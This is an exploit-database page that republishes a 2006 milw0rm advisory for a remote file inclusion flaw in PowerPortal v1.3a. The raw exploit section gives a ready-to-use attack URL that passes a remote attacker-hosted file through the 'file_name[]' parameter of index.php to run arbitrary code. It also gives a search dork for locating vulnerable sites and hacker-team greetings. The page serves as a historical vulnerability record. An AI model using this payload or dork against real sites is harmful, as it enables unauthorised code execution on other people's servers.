header-logo
Suggest Exploit
vendor:
PowerPortal
by:
v1per-haCker
N/A
CVSS
N/A
Remote File Include
98
CWE
Product Name: PowerPortal
Affected Version From: v1.3a
Affected Version To: v1.3a
Patch Exists: Yes
Related CWE: N/A
CPE: PowerPortal
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

PowerPortal Remote File Include

A vulnerability exists in PowerPortal v1.3a, which allows an attacker to include a remote file via the 'file_name[]' parameter in 'index.php'. An attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of PowerPortal
Source

Exploit-DB raw data:

#==============================================================================================
# PowerPortal Remote File Include
#===============================================================================================
#
#Critical Level : Dangerous
#
# scripts: PowerPortal
# download: http://www.scripts.com/jump.php?ID=13698
#Version : v1.3a
#dork : Powered by PowerPortal v1.3a
# note not tested on other version :)
#================================================================================================
#Bug in :
#/index.php
#
#================================================================================================
#Vuln Code :
# think :)
#================================================================================================
#
#Exploit :
#
#http://localhost/path_to_PowerPortal/index.php?file_name[]=http://eivlCode.txt?
#
#
#================================================================================================
#Discoverd By : v1per-haCker
#
#Conatact : v1per-hacker[at]hotmail.com
#XP10_hackEr Team
#Greetz to : abu_shahad ; RooT-shilL ; hetler_jeddah ; BooB11 ; FaTaL ; 
ThE-WoLf-KsA ; mohandko ; fooooz ; maVen
#thanx to str0ke :)
#and all members in XP10_hackEr Team
#WWW.XP10.COM
==================================================================================================

# milw0rm.com [2006-09-29]

Navigation

Suggest Exploit

Services By CQR